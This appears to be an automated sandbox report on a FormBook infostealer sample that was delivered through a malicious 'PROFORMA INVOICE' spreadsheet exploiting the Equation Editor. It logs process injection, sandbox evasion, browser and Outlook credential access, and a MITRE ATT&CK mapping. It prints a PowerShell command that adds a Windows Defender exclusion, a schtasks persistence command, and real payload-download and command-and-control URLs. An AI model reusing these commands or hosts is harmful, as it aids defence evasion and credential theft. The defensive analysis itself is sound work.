Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: C:\Users\Public\vbc.exe

Code function: 9_2_00408ED0 rdtsc

9_2_00408ED0

Source: C:\Users\Public\vbc.exe	Thread delayed: delay time: 45733	Jump to behavior
Source: C:\Users\Public\vbc.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	API call chain: ExitProcess graph end node	graph_2-598
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	API call chain: ExitProcess graph end node	graph_2-540
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	API call chain: ExitProcess graph end node	graph_2-581

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini	Jump to behavior

Source: explorer.exe, 0000000A.00000000.1021492466.00000000043F0000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&22BE343F&0&000000
Source: vbc.exe, 00000004.00000002.998529663.00000000027CF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: vbc.exe, 00000004.00000002.998529663.00000000027CF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vmware
Source: vbc.exe, 00000004.00000002.997219911.00000000004A7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMware_S
Source: explorer.exe, 0000000A.00000000.1021492466.00000000043F0000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0
Source: vbc.exe, 00000004.00000002.1000435054.0000000006320000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
Source: explorer.exe, 0000000A.00000000.1027349561.0000000008844000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&22BE343F&0&000000
Source: explorer.exe, 0000000A.00000000.999909369.000000000037B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.08tp
Source: explorer.exe, 0000000A.00000000.1021939258.0000000004423000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\ide#cdromnecvmwar_vmware_sata_cd01_______________1.00____#6&373888b8&0&1.0.0#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: vbc.exe, 00000004.00000002.998529663.00000000027CF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMware SVGA II
Source: explorer.exe, 0000000A.00000000.1021492466.00000000043F0000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: v6nel\5&35c44269e\cdromnvmware_sata_
Source: explorer.exe, 0000000A.00000000.1033695108.000000000434F000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: ide\cdromnecvmwar_vmware_sata_cd01_______________1.00____\6&373888b8&0&1.0.0Q
Source: vbc.exe, 00000004.00000002.998529663.00000000027CF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
Source: explorer.exe, 0000000A.00000000.1029308104.0000000000335000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}(

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\SysWOW64\mstsc.exe

Code function: 11_2_000D1660 FindFirstFileW,FindNextFileW,FindClose,

11_2_000D1660

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_03690487 mov edx, dword ptr fs:[00000030h]	2_2_03690487
Source: C:\Users\Public\vbc.exe	Code function: 9_2_008926F8 mov eax, dword ptr fs:[00000030h]	9_2_008926F8
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 11_2_025D26F8 mov eax, dword ptr fs:[00000030h]	11_2_025D26F8

Source: C:\Users\Public\vbc.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\mstsc.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Users\Public\vbc.exe

Code function: 9_2_00408ED0 rdtsc

9_2_00408ED0

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\mstsc.exe	Process token adjusted: Debug	Jump to behavior

Source: C:\Users\Public\vbc.exe

Code function: 9_2_0040A140 LdrLoadDll,

9_2_0040A140

Source: C:\Users\Public\vbc.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe	Domain query: www.employeebnsf.com
Source: C:\Windows\explorer.exe	Network Connect: 185.53.179.171 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 5.183.8.183 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.dems-clicks.com

Maps a DLL or memory area into another process

Source: C:\Users\Public\vbc.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\Public\vbc.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\Public\vbc.exe	Section loaded: unknown target: C:\Windows\SysWOW64\mstsc.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\Public\vbc.exe	Section loaded: unknown target: C:\Windows\SysWOW64\mstsc.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\mstsc.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\mstsc.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\mstsc.exe	Section loaded: unknown target: C:\Program Files (x86)\Mozilla Firefox\firefox.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\mstsc.exe	Section loaded: unknown target: C:\Program Files (x86)\Mozilla Firefox\firefox.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\mstsc.exe	Section loaded: unknown target: C:\Program Files (x86)\Mozilla Firefox\firefox.exe protection: execute and read and write	Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Users\Public\vbc.exe

Memory written: C:\Users\Public\vbc.exe base: 400000 value starts with: 4D5A

Jump to behavior

Adds a directory exclusion to Windows Defender

Source: C:\Users\Public\vbc.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\dDqpEdJEtzi.exe
Source: C:\Users\Public\vbc.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\dDqpEdJEtzi.exe			Jump to behavior

Sample uses process hollowing technique

Source: C:\Users\Public\vbc.exe	Section unmapped: C:\Windows\SysWOW64\mstsc.exe base address: 3B0000			Jump to behavior
Source: C:\Windows\SysWOW64\mstsc.exe	Section unmapped: C:\Program Files (x86)\Mozilla Firefox\firefox.exe base address: 8B0000			Jump to behavior

Queues an APC in another process (thread injection)

Source: C:\Users\Public\vbc.exe

Thread APC queued: target process: C:\Windows\explorer.exe

Jump to behavior

Modifies the context of a thread in another process (thread injection)

Source: C:\Users\Public\vbc.exe	Thread register set: target process: 1860	Jump to behavior
Source: C:\Users\Public\vbc.exe	Thread register set: target process: 1860	Jump to behavior
Source: C:\Windows\SysWOW64\mstsc.exe	Thread register set: target process: 1860	Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe"	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\dDqpEdJEtzi.exe	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\dDqpEdJEtzi" /XML "C:\Users\user\AppData\Local\Temp\tmp7282.tmp	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe	Jump to behavior
Source: C:\Windows\SysWOW64\mstsc.exe	Process created: C:\Program Files (x86)\Mozilla Firefox\firefox.exe C:\Program Files (x86)\Mozilla Firefox\Firefox.exe	Jump to behavior

Source: explorer.exe, 0000000A.00000000.1012652801.0000000000830000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000A.00000000.1053337399.0000000000830000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000A.00000000.1029899123.0000000000830000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 0000000A.00000000.1012652801.0000000000830000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000A.00000000.999837899.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1029308104.0000000000335000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Progman
Source: explorer.exe, 0000000A.00000000.1012652801.0000000000830000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000A.00000000.1053337399.0000000000830000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000A.00000000.1029899123.0000000000830000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Program Manager<

Source: C:\Users\Public\vbc.exe	Queries volume information: C:\Users\Public\vbc.exe VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\hh.exe VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected FormBook

Source: Yara match	File source: 9.0.vbc.exe.400000.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.vbc.exe.3842f58.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.0.vbc.exe.400000.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.0.vbc.exe.400000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.0.vbc.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.0.vbc.exe.400000.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000009.00000002.1069848663.0000000000140000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000000.1175795140.00000000000C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000000.995456995.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.1069986638.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.999123801.0000000003842000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000000.1028504490.000000000B6A9000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.1178186749.00000000000C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000000.1039502497.000000000B6A9000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.1069951838.0000000000380000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000000.1174695923.00000000000C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000000.995827598.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.1178294756.0000000000230000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.1178354979.0000000000260000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\SysWOW64\mstsc.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\SysWOW64\mstsc.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\mstsc.exe	File opened: C:\Users\user\AppData\Roaming\Opera Software\Opera Stable\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\mstsc.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies	Jump to behavior

Remote Access Functionality

Yara detected FormBook

Source: Yara match	File source: 9.0.vbc.exe.400000.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.vbc.exe.3842f58.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.0.vbc.exe.400000.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.0.vbc.exe.400000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.0.vbc.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.0.vbc.exe.400000.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000009.00000002.1069848663.0000000000140000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000000.1175795140.00000000000C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000000.995456995.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.1069986638.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.999123801.0000000003842000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000000.1028504490.000000000B6A9000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.1178186749.00000000000C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000000.1039502497.000000000B6A9000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.1069951838.0000000000380000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000000.1174695923.00000000000C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000000.995827598.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.1178294756.0000000000230000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.1178354979.0000000000260000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	1 Scripting	1 DLL Side-Loading	1 DLL Side-Loading	11 Disable or Modify Tools	1 OS Credential Dumping	3 File and Directory Discovery	Remote Services	1 Archive Collected Data	Exfiltration Over Other Network Medium	35 Ingress Tool Transfer	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	1 Shared Modules	1 Scheduled Task/Job	612 Process Injection	1 Deobfuscate/Decode Files or Information	LSASS Memory	113 System Information Discovery	Remote Desktop Protocol	1 Man in the Browser	Exfiltration Over Bluetooth	1 Encrypted Channel	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	23 Exploitation for Client Execution	Logon Script (Windows)	1 Scheduled Task/Job	1 Scripting	Security Account Manager	221 Security Software Discovery	SMB/Windows Admin Shares	1 Data from Local System	Automated Exfiltration	3 Non-Application Layer Protocol	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	1 Command and Scripting Interpreter	Logon Script (Mac)	Logon Script (Mac)	4 Obfuscated Files or Information	NTDS	2 Process Discovery	Distributed Component Object Model	1 Email Collection	Scheduled Transfer	113 Application Layer Protocol	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	1 Scheduled Task/Job	Network Logon Script	Network Logon Script	23 Software Packing	LSA Secrets	31 Virtualization/Sandbox Evasion	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	1 DLL Side-Loading	Cached Domain Credentials	1 Remote System Discovery	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	111 Masquerading	DCSync	Network Sniffing	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	31 Virtualization/Sandbox Evasion	Proc Filesystem	Network Service Scanning	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	612 Process Injection	/etc/passwd and /etc/shadow	System Network Connections Discovery	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
PROFORMA INVOICE.xlsx	35%	Virustotal		Browse
PROFORMA INVOICE.xlsx	24%	ReversingLabs	Document-OLE.Exploit.CVE-2018-0802

Dropped Files

Source	Detection	Scanner
C:\Users\Public\vbc.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Roaming\dDqpEdJEtzi.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe	100%	Joe Sandbox ML

Unpacked PE Files

Source	Detection	Scanner	Label	Download
9.0.vbc.exe.400000.9.unpack	100%	Avira	TR/Crypt.ZPACK.Gen	Download File
9.0.vbc.exe.400000.7.unpack	100%	Avira	TR/Crypt.ZPACK.Gen	Download File
9.2.vbc.exe.400000.0.unpack	100%	Avira	TR/Crypt.ZPACK.Gen	Download File
9.0.vbc.exe.400000.5.unpack	100%	Avira	TR/Crypt.ZPACK.Gen	Download File

Domains

Source	Detection	Scanner	Label	Link
www.employeebnsf.com	0%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label
http://wellformedweb.org/CommentAPI/	0%	URL Reputation	safe
http://198.12.89.166/55/vbc.exehhC:	0%	Avira URL Cloud	safe
http://www.iis.fhg.de/audioPA	0%	URL Reputation	safe
http://www.mozilla.com0	0%	URL Reputation	safe
http://www.dems-clicks.com/n6g4/?Rju=oW3KVVYfOUtMWnx9E4fO+4eOl+SZoa0wNCifvEB8Y9jnCg3EyPPrm8173PHAA8seoyylQg==&ohA=4hdXYFAH	100%	Avira URL Cloud	malware
http://windowsmedia.com/redir/services.asp?WMPFriendly=true	0%	URL Reputation	safe
http://treyresearch.net	0%	URL Reputation	safe
http://198.12.89.166/55/vbc.exej	0%	Avira URL Cloud	safe
http://198.12.89.166/55/vbc.exe	0%	Avira URL Cloud	safe
http://java.sun.com	0%	URL Reputation	safe
http://www.icra.org/vocabulary/.	0%	URL Reputation	safe
http://198.12.89.166/55/vbc.exen	0%	Avira URL Cloud	safe
www.admincost.com/n6g4/	0%	Avira URL Cloud	safe
http://www.employeebnsf.com/n6g4/?ohA=4hdXYFAH&Rju=/8Ga1vKBK5Zv+SvpDfc9R87wDDB6IH5FC+aL3DgDAA8ZWL71dgMkGG8I5dFlam/RYjehgQ==	100%	Avira URL Cloud	malware
http://computername/printers/printername/.printer	0%	Avira URL Cloud	safe
http://www.%s.comPA	0%	URL Reputation	safe
http://servername/isapibackend.dll	0%	Avira URL Cloud	safe
http://198.12.89.166/55/vbc.exeg	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
www.employeebnsf.com	185.53.179.171	true	true	0%, Virustotal, Browse	unknown
www.dems-clicks.com	5.183.8.183	true	true		unknown
www.cariniclinicalconsulting.com	104.21.75.67	true	false		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://www.dems-clicks.com/n6g4/?Rju=oW3KVVYfOUtMWnx9E4fO+4eOl+SZoa0wNCifvEB8Y9jnCg3EyPPrm8173PHAA8seoyylQg==&ohA=4hdXYFAH	true	Avira URL Cloud: malware	unknown
http://198.12.89.166/55/vbc.exe	true	Avira URL Cloud: safe	unknown
www.admincost.com/n6g4/	true	Avira URL Cloud: safe	low
http://www.employeebnsf.com/n6g4/?ohA=4hdXYFAH&Rju=/8Ga1vKBK5Zv+SvpDfc9R87wDDB6IH5FC+aL3DgDAA8ZWL71dgMkGG8I5dFlam/RYjehgQ==	true	Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://www.windows.com/pctv.	explorer.exe, 0000000A.00000000.1055600196.0000000003B10000.00000002.00000001.00040000.00000000.sdmp	false		high
http://investor.msn.com	explorer.exe, 0000000A.00000000.1055600196.0000000003B10000.00000002.00000001.00040000.00000000.sdmp	false		high
http://www.msnbc.com/news/ticker.txt	explorer.exe, 0000000A.00000000.1055600196.0000000003B10000.00000002.00000001.00040000.00000000.sdmp	false		high
http://wellformedweb.org/CommentAPI/	explorer.exe, 0000000A.00000000.1034409224.00000000046D0000.00000002.00000001.00040000.00000000.sdmp	false	URL Reputation: safe	unknown
http://198.12.89.166/55/vbc.exehhC:	EQNEDT32.EXE, 00000002.00000002.969988460.0000000000669000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.iis.fhg.de/audioPA	explorer.exe, 0000000A.00000000.1034409224.00000000046D0000.00000002.00000001.00040000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.piriform.com/ccleanerq	explorer.exe, 0000000A.00000000.1003477696.0000000002CBF000.00000004.00000001.00020000.00000000.sdmp	false		high
http://www.mozilla.com0	explorer.exe, 0000000A.00000000.1024716428.0000000007539000.00000004.00000010.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1036517344.0000000007539000.00000004.00000010.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.piriform.com/ccleaner1SPS0	explorer.exe, 0000000A.00000000.1009597733.0000000008617000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1026640673.0000000008617000.00000004.00000001.00020000.00000000.sdmp	false		high
http://windowsmedia.com/redir/services.asp?WMPFriendly=true	explorer.exe, 0000000A.00000000.1057754396.0000000003CF7000.00000002.00000001.00040000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.hotmail.com/oe	explorer.exe, 0000000A.00000000.1055600196.0000000003B10000.00000002.00000001.00040000.00000000.sdmp	false		high
http://treyresearch.net	explorer.exe, 0000000A.00000000.1034409224.00000000046D0000.00000002.00000001.00040000.00000000.sdmp	false	URL Reputation: safe	unknown
http://198.12.89.166/55/vbc.exej	EQNEDT32.EXE, 00000002.00000002.970273455.0000000003690000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check	explorer.exe, 0000000A.00000000.1057754396.0000000003CF7000.00000002.00000001.00040000.00000000.sdmp	false		high
http://java.sun.com	explorer.exe, 0000000A.00000000.999837899.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1029308104.0000000000335000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.icra.org/vocabulary/.	explorer.exe, 0000000A.00000000.1057754396.0000000003CF7000.00000002.00000001.00040000.00000000.sdmp	false	URL Reputation: safe	unknown
http://198.12.89.166/55/vbc.exen	EQNEDT32.EXE, 00000002.00000002.969951865.0000000000644000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.	explorer.exe, 0000000A.00000000.1013251551.0000000001DD0000.00000002.00000001.00040000.00000000.sdmp	false		high
